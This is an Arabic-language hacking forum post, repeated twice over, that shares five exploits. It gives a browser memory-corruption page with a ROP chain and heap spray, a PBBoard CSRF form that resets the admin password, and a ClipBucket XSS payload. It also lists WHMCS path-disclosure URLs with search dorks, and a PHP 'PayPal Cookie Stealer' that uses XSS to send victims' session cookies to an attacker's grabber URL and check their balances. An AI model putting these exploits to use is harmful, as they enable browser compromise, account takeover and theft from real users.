fares+hakerz
04-30-2014, 01:28 PM
السلام عليكم انشاء الله تكونو بخير
نبدا ب الثغرة الاولى وهي خاصة بالمتصفحات الفايرفوكس و الانترنيت اكسبولر
# Title : Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption
# Date: 2013-02-18
# Softwares Link:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# phone : +447024073406
# Author: The Black Devils
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
# Home: www.arab47.com منتديات عرب غرداية
# Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s
<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
function hakim()
{
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
document.write(rop);
var buffer = '\x41\x45\xF2'
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</body>
</html>
// Proof of concept
http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF
if you click on that link your browser will crash
http://5.53.78ae.static.theplanet.com/~amodio/dz.html
الثغرة الثانية
PBBoard Version 3.0.0 CSRF Vulnerability
Open a new html file and put the code below with changing
PBBoard Version 3.0.0 CSRF Vulnerability
Dork:Powered by PBBoard © Version 3.0.0
the url and click Send
HTML Code:
<form action="http://localhost/pbboard/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="pass">
<input type="submit" name="Submit" value="Send">
</form>
member_id For the user id (default value is 1 for admin)
new_password the new password to change for(default password is pass)
الثغرة الثالثة
Information
--------------------
Name : XSS Vulnerabilities in ClipBucket
Software : ClipBucket 2.6 and possibly below.
Vendor Homepage : http://clip-bucket.com
Vulnerability Type : Cross-Site Scripting
Severity : Critical
Researcher : Canberk Bolat
Advisory Reference : NS-12-013
Description
--------------------
ClipBucket is an OpenSource Multimedia Management Script Provided Free
to the Community. This script comes with all the bells & whistles
required to start your own Video Sharing website like Youtube,
Metacafe, Veoh, Hulu or any other top video distribution application
in matter of minutes. ClipBucket is fastest growing script which was
first started as Youtube Clone but now its advance features &
enhancements makes it the most versatile, reliable & scalable media
distribution platform with latest social networking features, while
staying light on your pockets. Whether you are a small fan club or a
big Multi Tier Network operator, Clipbucket will fulfill your video
management needs.
Details
--------------------
ClipBucket is affected by XSS vulnerabilities in version 2.6
Params: (cat, sort, time, seo_cat_name, cat, sort, time, page, seo_cat_name)
Files: (channels.php, collections.php, groups.php, photos.php, videos.php)
http://example.com/search_result.php?query=3&type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x005B39)%3C/script%3E&submit=Search
signup.php (POST: username)
You can read the full article about Cross-Site Scripting from here:
Cross-site Scripting (XSS)
Solution
--------------------
No fix.
Advisory Timeline
--------------------
05/12/2011 - First Contact
03/01/2012 - Second Contact - No Reply
19/10/2012 - Advisory Released
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
References
--------------------
Vendor Url / Patch : -
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-vulnerabilities-in-clipbucket/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection
and Cross-site Scripting (XSS) in all web applications regardless of
the platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allows it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
الثغرة الرابعة وهي الاحلى بينهم
WHMCS <= 5.1.3 Full Path Disclosure Vulnerability
[#] Dork : intext:netearthone.php
[#] exploit :
http://website/includes/smarty/Smarty_Compiler.class.php
http://website/modules/registrars/netearthone/netearthone.php
الثغرة الخامسة
PayPal Cookie Stealer exploit XSS-Free
<?php
/*
Website: You are not allowed to view links. Register or Login to view.
PayPal Cookie Stealer exploit XSS-Free (CarderX.com)
Coded by: mainl00p
Type: Private <No leech. **** you! **** m1nu3t and all his band _|_!>
(O)
<M
o <M PayPal Blow Up! Cross Site Scripting (The SWORD TEAM)
/| ...... /:M\------------------------------------------------,,,,,,
(O)[]XXXXXX[]I:K+}=====<{H}>================================------------>
\| ^^^^^^ \:W/------------------------------------------------''''''
o <W mainl00p
<W You are not allowed to view links. Register or Login to view.
(O)
*/
define("PPLOGIN_URL", "https://www.paypal.com/en");
define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name=%22/%3E%27&q=%22&search_cat=®ion=%22%3E%3Ciframe%20onload=alert(0)/%3E");
define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL
// I put automatically those fields (_t must be there, it can have random value, I preferred NULL)
function doXSS($Vector) {
echo "<form id=\"sui_m\" name=\"sui_m\" method=\"post\" class=\"\" action=\"" . PPXSS_URL . "\">
<input type=\"hidden\" name=\"_t\" value=\"\"/>
<input type=\"hidden\" name=\"_fl\" value=\"1\" />
<input type=\"hidden\" name=\"atoi\" value=\"0\" />
<input type=\"hidden\" name=\"min\" value=\"0\" />
<input type=\"hidden\" name=\"max[0]\" value=\"\" />
<input type=\"hidden\" name=\"load\" value=\"$Vector\" />
</form>
<script type=\"text/javascript\">document.getElementById(\"sui_m\").submit();</script>";
}
// Gets the cookie from GET parameter returned by XSS and stores it in file
function getCookie() {
if (isset($_GET["c"])) {
$f = fopen(COOKIE_FILE, "a");
$c = base64_encode($_GET["c"]);
fwrite($f, $c . "\n");
fclose($f);
}
}
// Reads the cookie from file
function readCookies() {
$c = file_get_contents(COOKIE_FILE);
return explode("\n", $c);
}
// Logs in and checks the ballance
function check($Cookie) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $Cookie);
$s = curl_exec($ch);
if (preg_match("/Ballance: (.*)\<\/b\>/i", $s, $z))
return $z[1];
return NULL;
}
// MAIN
if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
$ck = readCookies();
echo "<table style=\"font-size: 12px;\">\n";
echo "<tr style=\"background-color: red; color: white;\"><td style=\"width: 50px;\"><b>Id</b></td><td style=\"width: 700px;\"><b>Cookie</b></td><td><b>Check</b></td></tr>\n";
$i = 0;
foreach ($ck as $c) {
echo "<tr style=\"background-color: grey;\"><td>" . ++$i . "</td><td>$c</td><td><a href=\"?check=" . base64_encode($c) . "\">Check</a></td></tr>\n";
}
die("");
}
if (isset($_GET["check"]) && $_GET["check"] != "") {
$cz = check(check($_GET["check"]));
if ($cz != NULL)
echo "Ballance: " . $cz;
else
echo "Error logging in!";
die("");
}
$XSS = "\">**********window.location=" . EXPLOIT_URL . "?c=" . "\" + document.cookie;</script>";
doXSS($XSS);
?>
ارجو ان تنال اعجابكم وارجو التفاعل في منتدى . واهداء الى كل اعضاء ومشرفينا
نبدا ب الثغرة الاولى وهي خاصة بالمتصفحات الفايرفوكس و الانترنيت اكسبولر
# Title : Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption
# Date: 2013-02-18
# Softwares Link:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# phone : +447024073406
# Author: The Black Devils
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
# Home: www.arab47.com منتديات عرب غرداية
# Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s
<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
function hakim()
{
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
document.write(rop);
var buffer = '\x41\x45\xF2'
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</body>
</html>
// Proof of concept
http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF
if you click on that link your browser will crash
http://5.53.78ae.static.theplanet.com/~amodio/dz.html
الثغرة الثانية
PBBoard Version 3.0.0 CSRF Vulnerability
Open a new html file and put the code below with changing
PBBoard Version 3.0.0 CSRF Vulnerability
Dork:Powered by PBBoard © Version 3.0.0
the url and click Send
HTML Code:
<form action="http://localhost/pbboard/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="pass">
<input type="submit" name="Submit" value="Send">
</form>
member_id For the user id (default value is 1 for admin)
new_password the new password to change for(default password is pass)
الثغرة الثالثة
Information
--------------------
Name : XSS Vulnerabilities in ClipBucket
Software : ClipBucket 2.6 and possibly below.
Vendor Homepage : http://clip-bucket.com
Vulnerability Type : Cross-Site Scripting
Severity : Critical
Researcher : Canberk Bolat
Advisory Reference : NS-12-013
Description
--------------------
ClipBucket is an OpenSource Multimedia Management Script Provided Free
to the Community. This script comes with all the bells & whistles
required to start your own Video Sharing website like Youtube,
Metacafe, Veoh, Hulu or any other top video distribution application
in matter of minutes. ClipBucket is fastest growing script which was
first started as Youtube Clone but now its advance features &
enhancements makes it the most versatile, reliable & scalable media
distribution platform with latest social networking features, while
staying light on your pockets. Whether you are a small fan club or a
big Multi Tier Network operator, Clipbucket will fulfill your video
management needs.
Details
--------------------
ClipBucket is affected by XSS vulnerabilities in version 2.6
Params: (cat, sort, time, seo_cat_name, cat, sort, time, page, seo_cat_name)
Files: (channels.php, collections.php, groups.php, photos.php, videos.php)
http://example.com/search_result.php?query=3&type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x005B39)%3C/script%3E&submit=Search
signup.php (POST: username)
You can read the full article about Cross-Site Scripting from here:
Cross-site Scripting (XSS)
Solution
--------------------
No fix.
Advisory Timeline
--------------------
05/12/2011 - First Contact
03/01/2012 - Second Contact - No Reply
19/10/2012 - Advisory Released
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
References
--------------------
Vendor Url / Patch : -
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-vulnerabilities-in-clipbucket/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection
and Cross-site Scripting (XSS) in all web applications regardless of
the platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allows it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
الثغرة الرابعة وهي الاحلى بينهم
WHMCS <= 5.1.3 Full Path Disclosure Vulnerability
[#] Dork : intext:netearthone.php
[#] exploit :
http://website/includes/smarty/Smarty_Compiler.class.php
http://website/modules/registrars/netearthone/netearthone.php
الثغرة الخامسة
PayPal Cookie Stealer exploit XSS-Free
<?php
/*
Website: You are not allowed to view links. Register or Login to view.
PayPal Cookie Stealer exploit XSS-Free (CarderX.com)
Coded by: mainl00p
Type: Private <No leech. **** you! **** m1nu3t and all his band _|_!>
(O)
<M
o <M PayPal Blow Up! Cross Site Scripting (The SWORD TEAM)
/| ...... /:M\------------------------------------------------,,,,,,
(O)[]XXXXXX[]I:K+}=====<{H}>================================------------>
\| ^^^^^^ \:W/------------------------------------------------''''''
o <W mainl00p
<W You are not allowed to view links. Register or Login to view.
(O)
*/
define("PPLOGIN_URL", "https://www.paypal.com/en");
define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name=%22/%3E%27&q=%22&search_cat=®ion=%22%3E%3Ciframe%20onload=alert(0)/%3E");
define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL
// I put automatically those fields (_t must be there, it can have random value, I preferred NULL)
function doXSS($Vector) {
echo "<form id=\"sui_m\" name=\"sui_m\" method=\"post\" class=\"\" action=\"" . PPXSS_URL . "\">
<input type=\"hidden\" name=\"_t\" value=\"\"/>
<input type=\"hidden\" name=\"_fl\" value=\"1\" />
<input type=\"hidden\" name=\"atoi\" value=\"0\" />
<input type=\"hidden\" name=\"min\" value=\"0\" />
<input type=\"hidden\" name=\"max[0]\" value=\"\" />
<input type=\"hidden\" name=\"load\" value=\"$Vector\" />
</form>
<script type=\"text/javascript\">document.getElementById(\"sui_m\").submit();</script>";
}
// Gets the cookie from GET parameter returned by XSS and stores it in file
function getCookie() {
if (isset($_GET["c"])) {
$f = fopen(COOKIE_FILE, "a");
$c = base64_encode($_GET["c"]);
fwrite($f, $c . "\n");
fclose($f);
}
}
// Reads the cookie from file
function readCookies() {
$c = file_get_contents(COOKIE_FILE);
return explode("\n", $c);
}
// Logs in and checks the ballance
function check($Cookie) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $Cookie);
$s = curl_exec($ch);
if (preg_match("/Ballance: (.*)\<\/b\>/i", $s, $z))
return $z[1];
return NULL;
}
// MAIN
if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
$ck = readCookies();
echo "<table style=\"font-size: 12px;\">\n";
echo "<tr style=\"background-color: red; color: white;\"><td style=\"width: 50px;\"><b>Id</b></td><td style=\"width: 700px;\"><b>Cookie</b></td><td><b>Check</b></td></tr>\n";
$i = 0;
foreach ($ck as $c) {
echo "<tr style=\"background-color: grey;\"><td>" . ++$i . "</td><td>$c</td><td><a href=\"?check=" . base64_encode($c) . "\">Check</a></td></tr>\n";
}
die("");
}
if (isset($_GET["check"]) && $_GET["check"] != "") {
$cz = check(check($_GET["check"]));
if ($cz != NULL)
echo "Ballance: " . $cz;
else
echo "Error logging in!";
die("");
}
$XSS = "\">**********window.location=" . EXPLOIT_URL . "?c=" . "\" + document.cookie;</script>";
doXSS($XSS);
?>
ارجو ان تنال اعجابكم وارجو التفاعل في منتدى . واهداء الى كل اعضاء ومشرفينا